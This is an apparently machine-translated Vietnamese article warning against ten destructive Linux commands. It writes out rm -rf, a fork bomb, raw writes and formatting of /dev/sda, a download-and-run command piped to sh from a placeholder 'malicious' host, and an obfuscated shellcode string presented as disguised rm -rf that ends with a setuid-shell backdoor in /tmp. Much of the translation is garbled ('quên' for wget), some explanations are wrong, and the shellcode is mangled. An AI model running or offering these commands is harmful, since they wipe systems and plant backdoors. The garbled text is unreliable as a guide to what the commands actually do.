Tin tức và phân tích của tất cả các thiết bị di động

10 lệnh Linux nguy hiểm bạn không bao giờ nên sử dụng

Mặc dù các lệnh Linux có thể rất hiệu quả, hữu ích và thú vị nhưng một số trong số chúng có thể tàn phá hệ thống của bạn. Trong nội dung này, chúng tôi tập hợp một số lệnh Linux mà bạn nên chú ý hoặc không nên làm phiền.

Nếu bạn đã sử dụng hệ điều hành Linux trước đây, WindowsBạn biết nó độc lập hơn . Linux mã nguồn mở một hệ điều hành và cung cấp cho người dùng đủ tự do để thực hiện các hoạt động khác nhau. Tuy nhiên, Linux có thể là một hệ thống đầy thử thách đối với người dùng lần đầu.

Cũng như WindowsGiống như trong Linux, bạn có thể sử dụng nhiều thao tác khác nhau để thực hiện các thao tác khác nhau. lệnh đầu cuối có. Tuy nhiên WindowsKhông giống như Linux, nó không yêu cầu bạn xác nhận xem bạn có đang chạy bất kỳ lệnh nào có thể gây hại cho hệ thống của mình hay không. Vì vậy, chúng tôi khuyên bạn nên tránh các lệnh sau.

Dưới đây là 10 lệnh terminal Linux nguy hiểm nhất mà chúng tôi khuyên bạn không nên sử dụng:

1. rm -rf

rm -rf lệnh là một trong những cách nhanh nhất để xóa thư mục và nội dung của nó. Tuy nhiên, một lỗi đánh máy nhỏ hoặc sự thiếu hiểu biết có thể gây ra thiệt hại không thể khắc phục cho hệ điều hành của bạn. Một số tùy chọn được sử dụng với lệnh rm, như lệnh rm -r, xóa thư mục như hiện tại. Nó thậm chí còn xóa thư mục trống. rm -f lệnh cũng có thể xóa các tệp chỉ đọc và tất cả các tệp nằm trong thư mục gốc.

2. : () {: |: &} ;:

Lệnh trên thực chất là một lệnh quả bom ngã ba tấn công. Nó hoạt động bằng cách xác định một hàm được gọi hai lần, một lần ở nền trước và một lần ở nền sau. Đơn giản chỉ để giải thích lệnh; :() định nghĩa một hàm, |: gọi hàm từ bên trong và để nó chạy ở chế độ nền với &, ; chấm dứt chức năng và gọi hàm với :. Hệ thống tiếp tục làm việc liên tục cho đến khi nó bị treo.

3. lệnh> /dev/sda

Lệnh trên ghi đầu ra của lệnh vào thư mục /dev/sda. Lệnh ghi dữ liệu thô và tất cả các tệp trong thư mục được thay thế bằng dữ liệu thô. Do đó, toàn bộ dữ liệu trong khối bị mất.

4. thư mục mv/dev/null

Lệnh này về cơ bản tất cả các tập tin /dev/null di chuyển đến thư mục. Có, điều đó có nghĩa là xóa tất cả các tệp khỏi hệ thống.

5. quên http:// độc hại_source -O | sh

Lệnh trên tải xuống tập lệnh từ nguồn độc hại và sau đó chạy tập lệnh đó trên hệ thống của bạn. quên lệnh sẽ tải xuống tệp và lệnh sh sẽ mở tệp đã tải xuống trên hệ thống của bạn.

6. Mkfs.ext3 /dev/sda

Lệnh này chỉ định dạng khối ‘sda’ và bạn nên biết rằng ổ đĩa cứng của bạn sẽ được đặt lại sau khi chạy lệnh trên. Sau khi dữ liệu bị xóa, hệ thống vẫn không thể khôi phục được.

7. > Tập tin

Lệnh > Tệp được sử dụng để giải phóng nội dung tệp. Nếu kết quả của một lỗi đánh máy hoặc sai sót > xt.conf Nếu nó được thực thi dưới dạng , nó có thể ghi tệp cấu hình hoặc tệp hệ thống khác.

8. ^foo^bar

Lệnh này dùng để chỉnh sửa lệnh trước đó mà không cần phải gõ lại toàn bộ lệnh. Nhưng nếu bạn không kiểm tra cẩn thận sự thay đổi trong lệnh trước đó bằng lệnh thì bạn có thể gặp rủi ro và nó có thể thực sự có vấn đề.

9. dd if = /dev/ngẫu nhiên của = /dev/sda

Nếu bạn kết thúc lệnh trên bằng /dev/sda và nó sẽ ghi dữ liệu ngẫu nhiên cho khối. Tất nhiên, kết quả là hệ thống của bạn sẽ trở nên không nhất quán và không thể phục hồi được.

10. Lệnh vô hình

Lệnh bên dưới thực chất không gì khác hơn là lệnh đầu tiên (rm-rf) trong bài viết này. Nếu bạn viết mã vào terminal, bạn sẽ làm sạch thư mục gốc. Nó thực sự cho thấy mối đe dọa có thể được ẩn giấu và đôi khi không bị phát hiện. Bạn không biết mình đang làm gì và kết quả sẽ ra sao. Không biên dịch/chạy mã từ nguồn không xác định.

char đặc biệt[] __attribute__ ((section(“.text”))) /* đặc biệt phát hành */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff \xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56 \x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “ \xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/ sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

Mục lục